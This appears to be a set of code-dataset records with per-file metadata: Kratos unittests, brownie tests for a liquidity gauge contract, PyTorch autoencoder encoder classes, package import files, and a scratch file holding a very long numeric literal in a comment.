        self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckGeometricalPolynomialDegree(model_part), -1)

        docu = KratosMultiphysics.Parameters("""{"SurfaceLoadCondition3D3N" : "This is a pure displacement condition"}""")
        self.assertTrue(KratosMultiphysics.SpecificationsUtilities.GetDocumention(model_part).IsEquivalentTo(docu))

    @KratosUnittest.skipUnless(dependencies_are_available, "StructuralMechanicsApplication is not available")
    def test_specifications_utilities_conditions_dependencies_list(self):
        current_model = KratosMultiphysics.Model()
        model_part = current_model.CreateModelPart("Main")
        node1 = model_part.CreateNewNode(1, 0.0, 0.0, 0.0)
        node2 = model_part.CreateNewNode(2, 1.0, 0.0, 0.0)
        node3 = model_part.CreateNewNode(3, 1.0, 1.0, 0.0)
        prop1 = KratosMultiphysics.Properties(1)
        model_part.AddProperties(prop1)
        cond1 = model_part.CreateNewCondition("SurfaceLoadCondition3D3N", 1, [1, 2, 3], model_part.GetProperties()[1])
        cond1.Initialize(model_part.ProcessInfo)

        list_entities = KratosMultiphysics.Parameters("""{
            "condition_list" : ["SurfaceLoadCondition3D3N"]
        }""")

        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
        KratosMultiphysics.SpecificationsUtilities.AddMissingVariablesFromEntitiesList(model_part, list_entities)
        self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 3)

        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y))
        self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z))
        KratosMultiphysics.SpecificationsUtilities.AddMissingDofsFromEntitiesList(model_part, list_entities)
        self.assertTrue(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X))
        self.assertTrue(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y))
        self.assertTrue(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z))

    def test_specifications_utilities_GetDofsListFromSpecifications(self):
        # Set up the test model part
        current_model = KratosMultiphysics.Model()
        model_part = current_model.CreateModelPart("Main")
        model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISTANCE)
        model_part.CreateNewNode(1, 0.0, 0.0, 0.0)
        model_part.CreateNewNode(2, 1.0, 0.0, 0.0)
        model_part.CreateNewNode(3, 0.0, 1.0, 0.0)
        model_part.CreateNewNode(4, 1.0, 1.0, 0.0)
        prop_1 = model_part.CreateNewProperties(1)
        model_part.CreateNewElement("DistanceCalculationElementSimplex2D3N", 1, [1, 2, 3], prop_1)
        model_part.CreateNewElement("DistanceCalculationElementSimplex2D3N", 2, [2, 4, 3], prop_1)

        # Get the DOFs list from the elements specifications
        dofs_list = KratosMultiphysics.SpecificationsUtilities.GetDofsListFromSpecifications(model_part)

        # Check the obtained DOFs list
        expected_dofs_list = ["DISTANCE"]
        self.assertEqual(dofs_list, expected_dofs_list)


if __name__ == '__main__':
    KratosUnittest.main()
| 62.716012 | 155 | 0.769738 | 1,932 | 20,759 | 8.103002 | 0.0647 | 0.090259 | 0.015522 | 0.012775 | 0.927435 | 0.90099 | 0.890131 | 0.881763 | 0.873778 | 0.873778 | 0 | 0.025927 | 0.136037 | 20,759 | 330 | 156 | 62.906061 | 0.846947 | 0.008189 | 0 | 0.82197 | 0 | 0 | 0.062479 | 0.027741 | 0 | 0 | 0 | 0 | 0.401515 | 1 | 0.037879 | false | 0 | 0.018939 | 0 | 0.060606 | 0.003788 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
31f322c09f463cf1af2901f181ad2c2644e6fc69 | 2,749 | py | Python | tests/unitary/LiquidityGaugeV5Collateral/test_deposit_withdraw.py | hedgx/ribbonomics | 84a212a82eaaa2824ebe3c072413e143eaca02a2 | [
"MIT"
] | null | null | null | tests/unitary/LiquidityGaugeV5Collateral/test_deposit_withdraw.py | hedgx/ribbonomics | 84a212a82eaaa2824ebe3c072413e143eaca02a2 | [
"MIT"
] | null | null | null | tests/unitary/LiquidityGaugeV5Collateral/test_deposit_withdraw.py | hedgx/ribbonomics | 84a212a82eaaa2824ebe3c072413e143eaca02a2 | [
"MIT"
] | null | null | null | import brownie
import pytest


@pytest.fixture(scope="module", autouse=True)
def deposit_setup(accounts, gauge_v5_collateral, mock_lp_token):
    mock_lp_token.approve(gauge_v5_collateral, 2 ** 256 - 1, {"from": accounts[0]})


def test_deposit(accounts, gauge_v5_collateral, mock_lp_token):
    balance = mock_lp_token.balanceOf(accounts[0])
    gauge_v5_collateral.deposit(100000, {"from": accounts[0]})

    assert mock_lp_token.balanceOf(gauge_v5_collateral) == 100000
    assert mock_lp_token.balanceOf(accounts[0]) == balance - 100000
    assert gauge_v5_collateral.totalSupply() == 100000
    assert gauge_v5_collateral.balanceOf(accounts[0]) == 100000


def test_deposit_zero(accounts, gauge_v5_collateral, mock_lp_token):
    balance = mock_lp_token.balanceOf(accounts[0])
    gauge_v5_collateral.deposit(0, {"from": accounts[0]})

    assert mock_lp_token.balanceOf(gauge_v5_collateral) == 0
    assert mock_lp_token.balanceOf(accounts[0]) == balance
    assert gauge_v5_collateral.totalSupply() == 0
    assert gauge_v5_collateral.balanceOf(accounts[0]) == 0


def test_deposit_insufficient_balance(accounts, gauge_v5_collateral, mock_lp_token):
    with brownie.reverts():
        gauge_v5_collateral.deposit(100000, {"from": accounts[1]})


def test_withdraw(accounts, gauge_v5_collateral, mock_lp_token):
    balance = mock_lp_token.balanceOf(accounts[0])
    gauge_v5_collateral.deposit(100000, {"from": accounts[0]})
    gauge_v5_collateral.withdraw(100000, {"from": accounts[0]})

    assert mock_lp_token.balanceOf(gauge_v5_collateral) == 0
    assert mock_lp_token.balanceOf(accounts[0]) == balance
    assert gauge_v5_collateral.totalSupply() == 0
    assert gauge_v5_collateral.balanceOf(accounts[0]) == 0


def test_withdraw_zero(accounts, gauge_v5_collateral, mock_lp_token):
    balance = mock_lp_token.balanceOf(accounts[0])
    gauge_v5_collateral.deposit(100000, {"from": accounts[0]})
    gauge_v5_collateral.withdraw(0, {"from": accounts[0]})

    assert mock_lp_token.balanceOf(gauge_v5_collateral) == 100000
    assert mock_lp_token.balanceOf(accounts[0]) == balance - 100000
    assert gauge_v5_collateral.totalSupply() == 100000
    assert gauge_v5_collateral.balanceOf(accounts[0]) == 100000


def test_withdraw_new_epoch(accounts, chain, gauge_v5_collateral, mock_lp_token):
    balance = mock_lp_token.balanceOf(accounts[0])
    gauge_v5_collateral.deposit(100000, {"from": accounts[0]})
    chain.sleep(86400 * 400)
    gauge_v5_collateral.withdraw(100000, {"from": accounts[0]})

    assert mock_lp_token.balanceOf(gauge_v5_collateral) == 0
    assert mock_lp_token.balanceOf(accounts[0]) == balance
    assert gauge_v5_collateral.totalSupply() == 0
    assert gauge_v5_collateral.balanceOf(accounts[0]) == 0
| 39.84058 | 84 | 0.75773 | 371 | 2,749 | 5.283019 | 0.110512 | 0.114286 | 0.277551 | 0.153061 | 0.865306 | 0.865306 | 0.865306 | 0.807143 | 0.807143 | 0.807143 | 0 | 0.071191 | 0.126228 | 2,749 | 68 | 85 | 40.426471 | 0.744796 | 0 | 0 | 0.659574 | 0 | 0 | 0.016733 | 0 | 0 | 0 | 0 | 0 | 0.425532 | 1 | 0.148936 | false | 0 | 0.042553 | 0 | 0.191489 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ee0de17a5e167480e16ba6c31b15fa265fc9d519 | 176 | py | Python | theseus/classification/models/__init__.py | kaylode/mediaeval21-vsa | 8c5e7d612393d511331124931843c2ed07192c1b | [
"MIT"
] | 1 | 2021-12-12T18:14:55.000Z | 2021-12-12T18:14:55.000Z | theseus/classification/models/__init__.py | kaylode/mediaeval21-vsa | 8c5e7d612393d511331124931843c2ed07192c1b | [
"MIT"
] | null | null | null | theseus/classification/models/__init__.py | kaylode/mediaeval21-vsa | 8c5e7d612393d511331124931843c2ed07192c1b | [
"MIT"
] | null | null | null | from theseus.base.models import MODEL_REGISTRY
from .timm_models import *
from .metavit import MetaVIT
MODEL_REGISTRY.register(BaseTimmModel)
MODEL_REGISTRY.register(MetaVIT) | 25.142857 | 46 | 0.852273 | 23 | 176 | 6.347826 | 0.478261 | 0.267123 | 0.287671 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085227 | 176 | 7 | 47 | 25.142857 | 0.906832 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ee18962f755c93d448f472b499ec0eca11a569e7 | 27,624 | py | Python | numbers.py | iAreth/arm | 5d316ddaa5ae19f0ce972810913aa79cbcb83e05 | [
"Apache-2.0"
] | null | null | null | numbers.py | iAreth/arm | 5d316ddaa5ae19f0ce972810913aa79cbcb83e05 | [
"Apache-2.0"
] | null | null | null | numbers.py | iAreth/arm | 5d316ddaa5ae19f0ce972810913aa79cbcb83e05 | [
"Apache-2.0"
] | null | null | null | # Suma, multiplicacion, division
# _one = 10+10000+25660123021034+62
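The commented-out lines in this scratch file (and the huge literals below) lean on Python's arbitrary-precision integers. A minimal runnable sketch of the same idea — the `_one` name and values come from the comment above, the `big` example is illustrative only:

```python
# Python ints never overflow, so sums and products of very large
# literals evaluate exactly.
_one = 10 + 10000 + 25660123021034 + 62
print(_one)  # 25660123031106

# (a + b)**2 expands exactly, even at 80+ digits.
big = 10 ** 40 + 7
print(big * big == 10 ** 80 + 14 * 10 ** 40 + 49)  # True
```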
# print(+ _one + 332423013445345343453453534345345345345345345345435345430200333242301344534534345345353324230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453424230134453453434534535343453453453453453453454353454302003543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534
34534534534534534534543534543020033324230134453453433242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302
00333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345
34543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534
53454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453
45345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345343324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430
2003332423013445345343453453534345345345345345345345435345430)
# print(type(_one))
| 4,604 | 27,533 | 0.998769 | 14 | 27,624 | 1,970.5 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.997465 | 0.000579 | 27,624 | 5 | 27,534 | 5,524.8 | 0.001775 | 0.999638 | 0 | null | 0 | null | 0 | 0 | null | 1 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
ee1e5cfa896f663a00d18bd3534e8697b0a51feb | 4,748 | py | Python | Autoencoders/encoders.py | ngroebner/Autoencoders | 49105c4aba2959c6973aeba41b9df4eb012f44ac | [
"MIT"
] | 1 | 2021-07-23T13:07:11.000Z | 2021-07-23T13:07:11.000Z | Autoencoders/encoders.py | ngroebner/Autoencoders | 49105c4aba2959c6973aeba41b9df4eb012f44ac | [
"MIT"
] | null | null | null | Autoencoders/encoders.py | ngroebner/Autoencoders | 49105c4aba2959c6973aeba41b9df4eb012f44ac | [
"MIT"
] | null | null | null | import numpy as np
import torch
from torch import nn, optim
from torch.nn import functional as F
from Autoencoders.layers import Flatten
class Encoder2DConv(nn.Module):
"""Constructs an encoder for use in various autoencoder models.
TODO: Consider passing a list to designate the number of convolutional
filters per layer.
TODO: Create another class for dilated convolutions and
causal dilated convolutions.
TODO: Add blocks and residuals? - Maybe better for a different class.
    Args:
        inputdims (tuple): Height and width of the input data.
        latentdims (int): Number of dimensions in the latent space.
        nlayers (int): Number of convolutional layers. Default is 2.
        nchannels (int): Number of channels in the input data.
            Default is 1.
        nfilters (int): Number of filters in each layer.
            Default is 32.
        kernel_size (int): Convolution kernel size. Default is 3.
        stride (int): Convolution stride. Default is 1.
        padding (int): Convolution padding. Default is 1.
        use_batchnorm (bool): Whether to add batch normalization
            after the first convolution. Default is False.
    """
def __init__(
self,
inputdims,
latentdims,
nlayers=2,
nchannels=1,
nfilters=32,
kernel_size=3,
stride=1,
padding=1,
use_batchnorm=False
):
super(Encoder2DConv, self).__init__()
        # arguments to Conv2d:
        # in_channels, out_channels, kernel_size,
        # stride, padding, dilation, groups, bias,
        # padding_mode
self.nchannels = nchannels
self.kernel_size = kernel_size
self.stride = stride
self.inputdims = inputdims
# string together arbitrary number of convolutional layers
convlayers = []
for layer in range(nlayers):
if layer == 0:
#first layer, in_channels = nchannels
convlayers.append(nn.Conv2d(nchannels, nfilters, kernel_size, stride, padding))
if use_batchnorm:
convlayers.append(nn.BatchNorm2d(nfilters))
convlayers.append(nn.ReLU())
else:
convlayers.append(nn.Conv2d(nfilters, nfilters, kernel_size, stride, padding))
convlayers.append(nn.ReLU())
self.convlayers = nn.Sequential(*convlayers)
self.flatten = Flatten()
self.latent = nn.Linear(nfilters*inputdims[0]*inputdims[1], latentdims)
def forward(self, x):
x = self.convlayers(x)
x = self.flatten(x)
return self.latent(x)
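With the defaults above (kernel_size=3, stride=1, padding=1) each convolution preserves the spatial dimensions, which is why the final linear layer can assume `nfilters * inputdims[0] * inputdims[1]` input features. A minimal sketch of that arithmetic (pure Python, independent of the classes above; the 28x28 input size is only an illustrative assumption):

```python
def conv2d_out_size(size, kernel_size=3, stride=1, padding=1):
    """Output length of one spatial dimension after nn.Conv2d
    (no dilation): floor((size + 2*padding - kernel_size) / stride) + 1."""
    return (size + 2 * padding - kernel_size) // stride + 1

# kernel_size=3, stride=1, padding=1 keeps a 28x28 input at 28x28,
# so the flattened feature count is nfilters * 28 * 28.
h = w = 28
nfilters = 32
assert conv2d_out_size(h) == h
flat_features = nfilters * conv2d_out_size(h) * conv2d_out_size(w)
print(flat_features)  # 25088
```

If stride or kernel size change, this invariant breaks and the linear layer size would need to be computed with the same formula.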
class VAEEncoder2DConv(nn.Module):
"""Constructs an encoder for use in various autoencoder models.
TODO: Consider passing a list to designate the number of convolutional
filters per layer.
TODO: Create another class for dilated convolutions and
causal dilated convolutions.
TODO: Add blocks and residuals? - Maybe better for a different class.
    Initializing the linear layers with Xavier normal initialization helps
    prevent KL loss explosion. E.g.:

        def init_weights(m):
            if isinstance(m, nn.Linear):
                nn.init.xavier_normal_(m.weight)
    Args:
        inputdims (tuple): Height and width of the input data.
        latentdims (int): Number of dimensions in the latent space.
        nlayers (int): Number of convolutional layers. Default is 2.
        nchannels (int): Number of channels in the input data.
            Default is 1.
        nfilters (int): Number of filters in each layer.
            Default is 32.
        kernel_size (int): Convolution kernel size. Default is 3.
        stride (int): Convolution stride. Default is 1.
        padding (int): Convolution padding. Default is 1.
        use_batchnorm (bool): Whether to add batch normalization
            after the first convolution. Default is False.
    """
def __init__(
self,
inputdims,
latentdims,
nlayers=2,
nchannels=1,
nfilters=32,
kernel_size=3,
stride=1,
padding=1,
use_batchnorm=False
):
super(VAEEncoder2DConv, self).__init__()
        # arguments to Conv2d:
        # in_channels, out_channels, kernel_size,
        # stride, padding, dilation, groups, bias,
        # padding_mode
self.nchannels = nchannels
self.kernel_size = kernel_size
self.stride = stride
self.inputdims = inputdims
# string together arbitrary number of convolutional layers
convlayers = []
for layer in range(nlayers):
if layer == 0:
#first layer, in_channels = nchannels
convlayers.append(nn.Conv2d(nchannels, nfilters, kernel_size, stride, padding))
if use_batchnorm:
convlayers.append(nn.BatchNorm2d(nfilters))
convlayers.append(nn.ReLU())
else:
convlayers.append(nn.Conv2d(nfilters, nfilters, kernel_size, stride, padding))
convlayers.append(nn.ReLU())
self.convlayers = nn.Sequential(*convlayers)
self.flatten = Flatten()
self.mu = nn.Linear(nfilters*inputdims[0]*inputdims[1], latentdims)
self.logvar = nn.Linear(nfilters*inputdims[0]*inputdims[1], latentdims)
def forward(self, x):
x = self.convlayers(x)
x = self.flatten(x)
return self.mu(x), self.logvar(x) | 34.405797 | 95 | 0.595619 | 520 | 4,748 | 5.359615 | 0.234615 | 0.043057 | 0.064586 | 0.049516 | 0.876929 | 0.876929 | 0.876929 | 0.876929 | 0.860423 | 0.860423 | 0 | 0.012473 | 0.324558 | 4,748 | 138 | 96 | 34.405797 | 0.856564 | 0.381634 | 0 | 0.815789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0 | 1 | 0.052632 | false | 0 | 0.065789 | 0 | 0.171053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
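The VAE encoder above only produces `mu` and `logvar`; the sampling step itself (the reparameterization trick, z = mu + eps * exp(0.5 * logvar)) lives outside this class. A minimal pure-Python sketch of that step, as an assumed usage pattern rather than part of this module:

```python
import math
import random

def reparameterize(mu, logvar, rng=random.Random(0)):
    """Sample z = mu + eps * sigma per dimension, with eps ~ N(0, 1)
    and sigma = exp(0.5 * logvar)."""
    return [m + rng.gauss(0.0, 1.0) * math.exp(0.5 * lv)
            for m, lv in zip(mu, logvar)]

z = reparameterize([0.0, 1.0], [0.0, 0.0])
print(len(z))  # one sample per latent dimension -> 2
```

Because the randomness is isolated in `eps`, gradients can flow through `mu` and `logvar`, which is the whole point of returning them separately from `forward`.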
ee8086f0c7dbfe5f769c17499d8be4b66fd6d7b8 | 226 | py | Python | rhea/cores/memmap/__init__.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | 1 | 2022-03-16T23:56:09.000Z | 2022-03-16T23:56:09.000Z | rhea/cores/memmap/__init__.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | null | null | null | rhea/cores/memmap/__init__.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | null | null | null |
from .memmap_controller import memmap_controller_basic
from .memmap_peripheral import memmap_peripheral_memory
from .memmap_peripheral import memmap_peripheral_regfile
from .memmap_command_bridge import memmap_command_bridge
| 37.666667 | 56 | 0.90708 | 29 | 226 | 6.62069 | 0.344828 | 0.208333 | 0.208333 | 0.270833 | 0.4375 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075221 | 226 | 5 | 57 | 45.2 | 0.91866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
c9ce98d984cebb79544873075a8af1f42c30e55f | 596 | py | Python | app/back/mongo/data/collect/__init__.py | jgphilpott/polyplot | c46861174ee5881dadffbfb2278d555462523547 | [
"MIT"
] | 5 | 2021-05-17T14:17:14.000Z | 2021-12-14T12:54:32.000Z | app/back/mongo/data/collect/__init__.py | jgphilpott/iGraph | 2a91ba57e4950856a83d3a109753f8f2badee829 | [
"MIT"
] | 8 | 2020-02-09T02:48:41.000Z | 2021-05-16T04:57:02.000Z | app/back/mongo/data/collect/__init__.py | jgphilpott/iGraph | 2a91ba57e4950856a83d3a109753f8f2badee829 | [
"MIT"
] | 2 | 2016-09-12T03:48:16.000Z | 2019-05-04T14:15:19.000Z | from back.mongo.data.collect.airports import *
from back.mongo.data.collect.cities import *
from back.mongo.data.collect.clients import *
from back.mongo.data.collect.countries import *
from back.mongo.data.collect.graticules import *
from back.mongo.data.collect.indicators import *
from back.mongo.data.collect.lakes import *
from back.mongo.data.collect.maps import *
from back.mongo.data.collect.metas import *
from back.mongo.data.collect.ports import *
from back.mongo.data.collect.railroads import *
from back.mongo.data.collect.rivers import *
from back.mongo.data.collect.roads import *
| 42.571429 | 48 | 0.803691 | 91 | 596 | 5.263736 | 0.208791 | 0.217119 | 0.352818 | 0.461378 | 0.80167 | 0.751566 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087248 | 596 | 13 | 49 | 45.846154 | 0.880515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
c9e3c9a90b26f393704e8ebd81019636d1563faf | 145 | py | Python | actioneer/__init__.py | vbe0201/Actioneer | 96df066ea40d2a51b1abb4bde2504af23c2c7c82 | [
"MIT"
] | null | null | null | actioneer/__init__.py | vbe0201/Actioneer | 96df066ea40d2a51b1abb4bde2504af23c2c7c82 | [
"MIT"
